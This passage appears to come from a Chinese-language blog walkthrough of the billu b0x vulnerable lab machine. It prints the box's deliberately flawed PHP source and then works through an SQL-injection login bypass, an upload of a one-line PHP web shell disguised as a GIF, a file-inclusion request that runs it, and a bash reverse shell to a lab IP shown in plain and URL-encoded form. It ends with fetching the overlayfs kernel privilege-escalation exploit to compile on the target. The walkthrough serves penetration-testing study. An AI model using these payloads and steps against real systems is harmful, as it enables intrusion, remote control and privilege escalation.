<span class="variable">$_SESSION</span>[<span class="string">&#x27;logged&#x27;</span>]=<span class="string">&#x27;&#x27;</span>;</span><br><span class="line">	</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;logged&#x27;</span>]==<span class="literal">true</span> &amp;&amp;  <span class="variable">$_SESSION</span>[<span class="string">&#x27;admin&#x27;</span>]!=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">&#123;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&quot;you are logged in :)&quot;</span>;</span><br><span class="line">	<span class="title function_ invoke__">header</span>(<span class="string">&#x27;Location: panel.php&#x27;</span>, <span class="literal">true</span>, <span class="number">302</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;&lt;div align=center style=&quot;margin:30px 0px 0px 0px;&quot;&gt;</span></span><br><span class="line"><span class="string">&lt;font size=8 face=&quot;comic sans ms&quot;&gt;--==[[ billu b0x ]]==--&lt;/font&gt; </span></span><br><span class="line"><span class="string">&lt;br&gt;&lt;br&gt;</span></span><br><span class="line"><span class="string">Show me your SQLI skills &lt;br&gt;</span></span><br><span class="line"><span class="string">&lt;form method=post&gt;</span></span><br><span class="line"><span class="string">Username :- &lt;Input type=text name=un&gt; &amp;nbsp Password:- &lt;input type=password name=ps&gt; &lt;br&gt;&lt;br&gt;</span></span><br><span class="line"><span class="string">&lt;input type=submit name=login value=&quot;let\&#x27;s login&quot;&gt;&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;login&#x27;</span>]))</span><br><span class="line">&#123;</span><br><span class="line">	<span class="variable">$uname</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;\&#x27;&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="title function_ invoke__">urldecode</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;un&#x27;</span>]));</span><br><span class="line">	<span class="variable">$pass</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;\&#x27;&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="title function_ invoke__">urldecode</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;ps&#x27;</span>]));</span><br><span class="line">	<span class="variable">$run</span>=<span class="string">&#x27;select * from auth where  pass=\&#x27;&#x27;</span>.<span class="variable">$pass</span>.<span class="string">&#x27;\&#x27; and uname=\&#x27;&#x27;</span>.<span class="variable">$uname</span>.<span class="string">&#x27;\&#x27;&#x27;</span>;</span><br><span class="line">	<span class="variable">$result</span> = <span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$conn</span>, <span class="variable">$run</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">mysqli_num_rows</span>(<span class="variable">$result</span>) &gt; <span class="number">0</span>) &#123;</span><br><span class="line"></span><br><span class="line"><span class="variable">$row</span> = <span class="title function_ invoke__">mysqli_fetch_assoc</span>(<span class="variable">$result</span>);</span><br><span class="line">	   <span class="keyword">echo</span> <span class="string">&quot;You are allowed&lt;br&gt;&quot;</span>;</span><br><span class="line">	   <span class="variable">$_SESSION</span>[<span class="string">&#x27;logged&#x27;</span>]=<span class="literal">true</span>;</span><br><span class="line">	   <span class="variable">$_SESSION</span>[<span class="string">&#x27;admin&#x27;</span>]=<span class="variable">$row</span>[<span class="string">&#x27;username&#x27;</span>];</span><br><span class="line">	   </span><br><span class="line">	 <span class="title function_ invoke__">header</span>(<span class="string">&#x27;Location: panel.php&#x27;</span>, <span class="literal">true</span>, <span class="number">302</span>);</span><br><span class="line">   </span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&quot;&lt;script&gt;alert(&#x27;Try again&#x27;);&lt;/script&gt;&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line">	</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;font size=5 face=\&quot;comic sans ms\&quot; style=\&quot;left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\&quot;&gt;B0X Powered By &lt;font color=#ff9933&gt;Pirates&lt;/font&gt; &quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>panel.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;c.php&#x27;</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;head2.php&#x27;</span>);</span><br><span class="line"><span class="keyword">if</span>(@<span class="variable">$_SESSION</span>[<span class="string">&#x27;logged&#x27;</span>]!=<span class="literal">true</span> )</span><br><span class="line">&#123;</span><br><span class="line">		<span class="title function_ invoke__">header</span>(<span class="string">&#x27;Location: index.php&#x27;</span>, <span class="literal">true</span>, <span class="number">302</span>);</span><br><span class="line">		<span class="keyword">exit</span>();</span><br><span class="line">	</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;Welcome to billu b0x &quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;&lt;form method=post style=&quot;margin: 10px 0px 10px 95%;&quot;&gt;&lt;input type=submit name=lg value=Logout&gt;&lt;/form&gt;&#x27;</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;lg&#x27;</span>]))</span><br><span class="line">&#123;</span><br><span class="line">	<span class="keyword">unset</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;logged&#x27;</span>]);</span><br><span class="line">	<span class="keyword">unset</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;admin&#x27;</span>]);</span><br><span class="line">	<span class="title function_ invoke__">header</span>(<span class="string">&#x27;Location: index.php&#x27;</span>, <span class="literal">true</span>, <span class="number">302</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;&lt;hr&gt;&lt;br&gt;&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;&lt;form method=post&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&lt;select name=load&gt;</span></span><br><span class="line"><span class="string">    &lt;option value=&quot;show&quot;&gt;Show Users&lt;/option&gt;</span></span><br><span class="line"><span class="string">	&lt;option value=&quot;add&quot;&gt;Add User&lt;/option&gt;</span></span><br><span class="line"><span class="string">&lt;/select&gt; </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> &amp;nbsp&lt;input type=submit name=continue value=&quot;continue&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&#x27;</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;continue&#x27;</span>]))</span><br><span class="line">&#123;</span><br><span class="line">	<span class="variable">$dir</span>=<span class="title function_ invoke__">getcwd</span>();</span><br><span class="line">	<span class="variable">$choice</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;./&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$_POST</span>[<span class="string">&#x27;load&#x27;</span>]);</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">if</span>(<span class="variable">$choice</span>===<span class="string">&#x27;add&#x27;</span>)</span><br><span class="line">	&#123;</span><br><span class="line">       		<span class="keyword">include</span>(<span class="variable">$dir</span>.<span class="string">&#x27;/&#x27;</span>.<span class="variable">$choice</span>.<span class="string">&#x27;.php&#x27;</span>);</span><br><span class="line">			<span class="keyword">die</span>();</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$choice</span>===<span class="string">&#x27;show&#x27;</span>)</span><br><span class="line">	&#123;</span><br><span class="line">        </span><br><span class="line">		<span class="keyword">include</span>(<span class="variable">$dir</span>.<span class="string">&#x27;/&#x27;</span>.<span class="variable">$choice</span>.<span class="string">&#x27;.php&#x27;</span>);</span><br><span class="line">		<span class="keyword">die</span>();</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span></span><br><span class="line">	&#123;</span><br><span class="line">		<span class="keyword">include</span>(<span class="variable">$dir</span>.<span class="string">&#x27;/&#x27;</span>.<span class="variable">$_POST</span>[<span class="string">&#x27;load&#x27;</span>]);</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;upload&#x27;</span>]))</span><br><span class="line">&#123;</span><br><span class="line">	</span><br><span class="line">	<span class="variable">$name</span>=<span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$conn</span>,<span class="variable">$_POST</span>[<span class="string">&#x27;name&#x27;</span>]);</span><br><span class="line">	<span class="variable">$address</span>=<span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$conn</span>,<span class="variable">$_POST</span>[<span class="string">&#x27;address&#x27;</span>]);</span><br><span class="line">	<span class="variable">$id</span>=<span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$conn</span>,<span class="variable">$_POST</span>[<span class="string">&#x27;id&#x27;</span>]);</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;image&#x27;</span>][<span class="string">&#x27;name&#x27;</span>]))</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="variable">$iname</span>=<span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$conn</span>,<span class="variable">$_FILES</span>[<span class="string">&#x27;image&#x27;</span>][<span class="string">&#x27;name&#x27;</span>]);</span><br><span class="line">	<span class="variable">$r</span>=<span class="title function_ invoke__">pathinfo</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;image&#x27;</span>][<span class="string">&#x27;name&#x27;</span>],PATHINFO_EXTENSION);</span><br><span class="line">	<span class="variable">$image</span>=<span class="keyword">array</span>(<span class="string">&#x27;jpeg&#x27;</span>,<span class="string">&#x27;jpg&#x27;</span>,<span class="string">&#x27;gif&#x27;</span>,<span class="string">&#x27;png&#x27;</span>);</span><br><span class="line">	<span class="keyword">if</span>(<span class="title function_ invoke__">in_array</span>(<span class="variable">$r</span>,<span class="variable">$image</span>))</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="variable">$finfo</span> = @<span class="keyword">new</span> <span class="title function_ invoke__">finfo</span>(FILEINFO_MIME); </span><br><span class="line">	<span class="variable">$filetype</span> = @<span class="variable">$finfo</span>-&gt;<span class="title function_ invoke__">file</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;image&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>]);</span><br><span class="line">		<span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/image\/jpeg/&#x27;</span>,<span class="variable">$filetype</span> )  || <span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/image\/png/&#x27;</span>,<span class="variable">$filetype</span> ) || <span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/image\/gif/&#x27;</span>,<span class="variable">$filetype</span> ))</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;image&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>], <span class="string">&#x27;uploaded_images/&#x27;</span>.<span class="variable">$_FILES</span>[<span class="string">&#x27;image&#x27;</span>][<span class="string">&#x27;name&#x27;</span>]))</span><br><span class="line">                 &#123;</span><br><span class="line">                  <span class="keyword">echo</span> <span class="string">&quot;Uploaded successfully &quot;</span>;</span><br><span class="line">                  <span class="variable">$update</span>=<span class="string">&#x27;insert into users(name,address,image,id) values(\&#x27;&#x27;</span>.<span class="variable">$name</span>.<span class="string">&#x27;\&#x27;,\&#x27;&#x27;</span>.<span class="variable">$address</span>.<span class="string">&#x27;\&#x27;,\&#x27;&#x27;</span>.<span class="variable">$iname</span>.<span class="string">&#x27;\&#x27;, \&#x27;&#x27;</span>.<span class="variable">$id</span>.<span class="string">&#x27;\&#x27;)&#x27;</span>; </span><br><span class="line">                 <span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$conn</span>, <span class="variable">$update</span>);</span><br><span class="line"></span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;i told you dear, only png,jpg and gif file are allowed&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span></span><br><span class="line">	&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;only png,jpg and gif file are allowed&quot;</span>;		</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>test.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">file_download</span>(<span class="params"><span class="variable">$download</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">file_exists</span>(<span class="variable">$download</span>))</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="title function_ invoke__">header</span>(<span class="string">&quot;Content-Description: File Transfer&quot;</span>); </span><br><span class="line"></span><br><span class="line">            <span class="title function_ invoke__">header</span>(<span class="string">&#x27;Content-Transfer-Encoding: binary&#x27;</span>);</span><br><span class="line">            <span class="title function_ invoke__">header</span>(<span class="string">&#x27;Expires: 0&#x27;</span>);</span><br><span class="line">            <span class="title function_ invoke__">header</span>(<span class="string">&#x27;Cache-Control: must-revalidate, post-check=0, pre-check=0&#x27;</span>);</span><br><span class="line">            <span class="title function_ invoke__">header</span>(<span class="string">&#x27;Pragma: public&#x27;</span>);</span><br><span class="line">            <span class="title function_ invoke__">header</span>(<span class="string">&#x27;Accept-Ranges: bytes&#x27;</span>);</span><br><span class="line">            <span class="title function_ invoke__">header</span>(<span class="string">&#x27;Content-Disposition: attachment; filename=&quot;&#x27;</span>.<span class="title function_ invoke__">basename</span>(<span class="variable">$download</span>).<span class="string">&#x27;&quot;&#x27;</span>); </span><br><span class="line">            <span class="title function_ invoke__">header</span>(<span class="string">&#x27;Content-Length: &#x27;</span> . <span class="title function_ invoke__">filesize</span>(<span class="variable">$download</span>));</span><br><span class="line">            <span class="title function_ invoke__">header</span>(<span class="string">&#x27;Content-Type: application/octet-stream&#x27;</span>); </span><br><span class="line">            <span class="title function_ invoke__">ob_clean</span>();</span><br><span class="line">            <span class="title function_ invoke__">flush</span>();</span><br><span class="line">            <span class="title function_ invoke__">readfile</span> (<span class="variable">$download</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;file not found&quot;</span>;	</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;file&#x27;</span>]))</span><br><span class="line">&#123;</span><br><span class="line"><span class="title function_ invoke__">file_download</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;file&#x27;</span>]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;\&#x27;file\&#x27; parameter is empty. Please provide file path in \&#x27;file\&#x27; parameter &#x27;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
</ul>
<p>观察index.php，在登录逻辑中发现如下代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;login&#x27;</span>]))</span><br><span class="line">&#123;</span><br><span class="line">	<span class="variable">$uname</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;\&#x27;&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="title function_ invoke__">urldecode</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;un&#x27;</span>]));</span><br><span class="line">	<span class="variable">$pass</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;\&#x27;&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="title function_ invoke__">urldecode</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;ps&#x27;</span>]));</span><br><span class="line">	<span class="variable">$run</span>=<span class="string">&#x27;select * from auth where pass=\&#x27;&#x27;</span>.<span class="variable">$pass</span>.<span class="string">&#x27;\&#x27; and uname=\&#x27;&#x27;</span>.<span class="variable">$uname</span>.<span class="string">&#x27;\&#x27;&#x27;</span>;</span><br><span class="line">	<span class="variable">$result</span> = <span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$conn</span>, <span class="variable">$run</span>);</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>与登录有关，解析其中的SQL语句，换成标准格式：</p>
<p><code>select * from auth where pass=&#39;$passwd&#39; and uname=&#39;$username&#39;</code></p>
<p>发现可以使用<code>\</code>将单引号转义，从而实现SQL注入</p>
<p>登录界面输入：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">username: or 1=1 # </span><br><span class="line"></span><br><span class="line">password: \</span><br></pre></td></tr></table></figure>

<p>注入成功</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250120649.png" alt="image-20231025012005293"></p>
<h1 id="寻找漏洞"><a href="#寻找漏洞" class="headerlink" title="寻找漏洞"></a>寻找漏洞</h1><h2 id="发现并利用文件上传漏洞"><a href="#发现并利用文件上传漏洞" class="headerlink" title="发现并利用文件上传漏洞"></a>发现并利用文件上传漏洞</h2><p>登录后发现有一个上传文件的接口(同时也是&#x2F;add.php的功能，之前路径暴力破解时找到的)：</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250120053.png" alt="image-20231025012014665"></p>
<p>尝试进行一句话木马文件的上传，即在上传的文件中添加<code>&lt;?php system($_GET[&quot;cmd&quot;]);?&gt;</code>内容，看能否执行。</p>
<h3 id="上传一句话木马文件"><a href="#上传一句话木马文件" class="headerlink" title="上传一句话木马文件"></a>上传一句话木马文件</h3><p>建立getin.php文件，内容为<code>&lt;?php system($_GET[&quot;cmd&quot;]);?&gt;</code>, 尝试直接上传，失败。只允许png, jpg, gif文件</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250120918.png" alt="image-20231025012059545"></p>
<p>有三种检测可能性：</p>
<ol>
<li><p>检测文件后缀</p>
</li>
<li><p>检测请求中的Content-Type</p>
</li>
<li><p>对文件内容检测，需要对内容伪造</p>
</li>
</ol>
<p>我们使用burpsuite拦截请求，依次尝试</p>
<ol>
<li><p>将请求中filename后缀修改为png，再次上传。失败</p>
</li>
<li><p>将Content-Type修改为：image&#x2F;png，上传，失败</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250121840.png" alt="image-20231025012118779"></p>
</li>
<li><p>对内容进行伪造，在文件内容开头加上一个图形格式的标记 <code>GIF89a;</code>，再次上传，成功！</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250121252.png" alt="image-20231025012129198"></p>
</li>
</ol>
<h3 id="测试是否可以执行命令"><a href="#测试是否可以执行命令" class="headerlink" title="测试是否可以执行命令"></a>测试是否可以执行命令</h3><p>上传成功后，点击Show Users，查看html内容，发现上传的文件在<code>uploaded_images/</code>下。</p>
<p>拦截Show Users请求</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250121867.png" alt="image-20231025012139515"></p>
<p>根据请求体以及panel.php的如下内容：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$choice</span>===<span class="string">&#x27;show&#x27;</span>)</span><br><span class="line">	&#123;</span><br><span class="line">        </span><br><span class="line">		<span class="keyword">include</span>(<span class="variable">$dir</span>.<span class="string">&#x27;/&#x27;</span>.<span class="variable">$choice</span>.<span class="string">&#x27;.php&#x27;</span>);</span><br><span class="line">		<span class="keyword">die</span>();</span><br><span class="line">	&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">	&#123;</span><br><span class="line">		<span class="keyword">include</span>(<span class="variable">$dir</span>.<span class="string">&#x27;/&#x27;</span>.<span class="variable">$_POST</span>[<span class="string">&#x27;load&#x27;</span>]);</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p>可以看出load后的参数是其他的内容，则会直接引用该文件，这为我们执行木马文件提供了机会。</p>
<p>通过burp构建请求：<code>POST /panel.php?cmd=ls HTTP/1.1</code></p>
<p>请求参数为：<code>load=uploaded_images/getin.png&amp;continue=continue</code></p>
<p>发送请求，发现成功执行命令</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250121466.png" alt="image-20231025012151082"></p>
<h1 id="建立反弹shell"><a href="#建立反弹shell" class="headerlink" title="建立反弹shell"></a>建立反弹shell</h1><p>将命令修改为<code>echo &quot;bash -i &gt;&amp; /dev/tcp/10.0.2.15/3333 0&gt;&amp;1&quot; | bash</code>，在本机用<code>nc -nvlp 3333</code>监听3333端口。发送请求</p>
<p>但是发现并未成功建立反弹shell。可以想到是因为请求url里有空格导致命令没有被正确传递</p>
<p>考虑使用url16进制编码解决空格的问题。加密后是没有空格的，并且后端会自动解码。先用几个简单的命令进行测试，发现可行。于是对上述命令进行编码，得到结果：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%32%2e%31%35%2f%33%33%33%33%20%30%3e%26%31%22%20%7c%20%62%61%73%68</span><br></pre></td></tr></table></figure>

<p>用该内容替换命令，然后再次发送请求</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250122753.png" alt="image-20231025012210380"></p>
<p>发现成功建立反弹shell</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250122308.png" alt="image-20231025012221926"></p>
<blockquote>
<p>这里遇到一个问题，编码<code>echo &quot;bash -i &gt;&amp; /dev/tcp/10.0.2.15/3333 0&gt;&amp;1&quot; | bash</code>后发送请求可以成功建立反弹shell。但如果编码<code>bash -i &gt;&amp; /dev/tcp/10.0.2.15/3333 0&gt;&amp;1</code>命令，就无法建立反弹shell。目前还未搞懂是为什么。</p>
</blockquote>
<blockquote>
<p>命令及其编码如下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&quot;bash -i &gt;&amp; /dev/tcp/10.0.2.15/3333 0&gt;&amp;1&quot;</span> | bash</span><br><span class="line">%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%32%2e%31%35%2f%33%33%33%33%20%30%3e%26%31%22%20%7c%20%62%61%73%68</span><br><span class="line"></span><br><span class="line">bash -i &gt;&amp; /dev/tcp/10.0.2.15/3333 0&gt;&amp;1</span><br><span class="line">%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%32%2e%31%35%2f%33%33%33%33%20%30%3e%26%31</span><br></pre></td></tr></table></figure>
</blockquote>
<h1 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h1><p><code>uname -a</code> 命令查看Linux版本</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250122451.png" alt="image-20231025012233079"></p>
<p>在kali上使用<code>searchsploit</code>查找漏洞(与exploit-db网站上是一样的)</p>
<p><code>searchsploit Kernel 3.13.0</code></p>
<p>得到众多结果</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250122762.png" alt="image-20231025012243393"></p>
<p>从中找到可能有用的，进行尝试。下面这个最可能有用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Linux Kernel 3.13.0 &lt; 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - &#x27;overlayfs&#x27; Local Privilege Escala | linux/local/37292.c</span><br></pre></td></tr></table></figure>

<p>用<code>searchsploit -m 37292</code> 命令将该文件拷贝到当前目录</p>
<p>kali用python开启web服务</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250122159.png" alt="image-20231025012255798"></p>
<p>用反弹shell在靶机上进入&#x2F;tmp目录(该目录下所有用户都有写权限，避免权限不足)，下载该文件，在靶机上编译并运行(需要靶机上有gcc，刚好该靶机上有)</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250123110.png" alt="image-20231025012306742"></p>
